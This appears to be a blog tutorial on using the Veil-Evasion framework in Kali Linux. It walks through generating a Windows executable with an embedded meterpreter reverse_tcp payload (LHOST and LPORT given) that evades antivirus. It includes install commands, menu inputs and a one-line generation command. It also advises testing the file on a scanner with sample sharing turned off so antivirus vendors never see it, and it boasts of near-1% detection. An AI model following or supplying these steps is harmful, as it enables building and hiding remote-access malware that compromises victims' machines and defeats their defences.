Evading Antivirus using Veil-Framework in Kali Linux

102ada821a55c0245b3b1cfe82bec37f

Veil is a Python program that attempts to automate the creation of AV-evading payloads in a new framework.

Veil-Evasion is a tool to generate payload executables that bypass common antivirus solutions by creating each payload with randomness. Veil-Evasion’s code is located at https://www.github.com/Veil-Framework/Veil-Evasion/ and it’s a part of the Veil super project at https://github.com/Veil-Framework/Veil which we recommend mosts users clone and install.

We can also use the payloads from Metasploit framework and its compatible for both x86 and x64 arch and update Veil either the command line or menu.

If you want to install Veil in your own environment you can use the commands below:

#wget -c https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master

#unzip -q master.zip

#cd Veil-Evasion-master/setup

#./setup.sh

Screenshot from 2014-05-21 10:55:10

Screenshot from 2014-05-21 11:54:28

Screenshot from 2014-05-21 11:54:57

Screenshot from 2014-05-21 11:56:56

After Veil is installed, just run it with the command below:

#./Veil-Evasion.py

Screenshot from 2014-05-21 07:09:51

Then change to the “Veil-Master” directory and launch the ./Veil-Evasion.py python script. The Veil window will appear. You see that today it has 31 payloads:

You can obtain a list of all the payloads with the “list” command:

Screenshot from 2014-05-21 07:10:12

[>] Please enter a command: list

[>] Please enter a command: use 27

Screenshot from 2014-05-21 07:10:48

[>] Please enter a command: set use_pyherion  Y

Screenshot from 2014-05-21 07:11:10

The payloads include PyInjector-style payload injection with or without encryption and PowerShell injection of payloads.PyInjector creates a Python executable with an embedded ASCII payload in it, but it uses standard Windows API calls to put the payload in memory and execute it.

Both of these methods are very effective for AV evasion. I am going to use the  python/b64_substitution payload. This method will use the PyInjector style of injection with substitution of the payload. I type”use 27″ and press Enter. It loads that component, as shown below:

[>] Please enter a command: generate

After giving  generate command, Then it’s necessary to wait while the shellcode is been generated.

Now we are going to select msfvenom typing “1”

[>] Please enter the number of your choice :  1

Screenshot from 2014-05-21 07:11:13

After that we need to type some details:

Enter metasploit payload: “windows/meterpreter/reverse_tcp”

Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”

Enter value for ‘LPORT’: “443”

Screenshot from 2014-05-21 07:11:36

Screenshot from 2014-05-21 07:11:38

You need to press enter and then Veil requests us the name of our payload. In this case “undetectable”

We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type “1”

[>] Please enter the number of your choice :  1

Screenshot from 2014-05-21 07:12:22

Next, I issue the “generate” command and press enter to create the executable.

The Python programmers reading this will certainly appreciate the source code that is produced. Look at this beautiful hot mess of a program! All the variable names are randomized. The payloads are encrypted and encoded.

But,it gets even better to accessible directly from the command line, so you don’t have to use the console to generate these payloads.

I can generate the same payload by running the following single command:

#./Veil-Evasion.py  -l  python -p python/b64_substitution  -o trytofindthis –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=192.168.31.20 LPORT=443

With this command-line-style interface, you can bypass the menu system of Veil, and scripts.

In the end, we can get our executable at “/root/Veil-master/output/compiled/”

Screenshot from 2014-05-21 07:13:06

Screenshot from 2014-05-21 07:13:26

The veil’s developers don’t want to submit any payload to http://www.virustotal.com to avoid distribution to the anti-virus vendors. There are an alternativeuse  vscan.novirusthanks.org. That site scan the suspicious files for malware detection and offer us the option below: “Do not distribute the sample”.

Now, we have our executable and we are going to submit it to vscan.novirusthanks.org. Please, remember to check “Do not distribute the sample”. If you choose to don’t check this options or you decide to submit the executable to http://www.virustotal.com your file will be investigated and maybe it will be recognized by some anti-virus vendors.

Screenshot from 2014-05-21 05:02:55

Screenshot from 2014-05-21 05:02:03

Screenshot from 2014-05-21 05:02:22

You can see in the picture above any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of near 1%!!!!

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

StormSecurity

IT Security Research and Services

govolution

About assembler and stuff

Astr0baby's not so random thoughts _____ rand() % 100;

ψυχῆς ἰατρεῖον "Hospital of the soul"

Penetration Testing Academy

Education and Advice for Rookies

P.M.C.S.P. Blog

Articles about Physics, Math, Computer Security & Programming and more

Chimera | Security

#YorkshireAnalyst #SIEMJunkie #ALLOPIONIONSAREMYOWN

%d bloggers like this: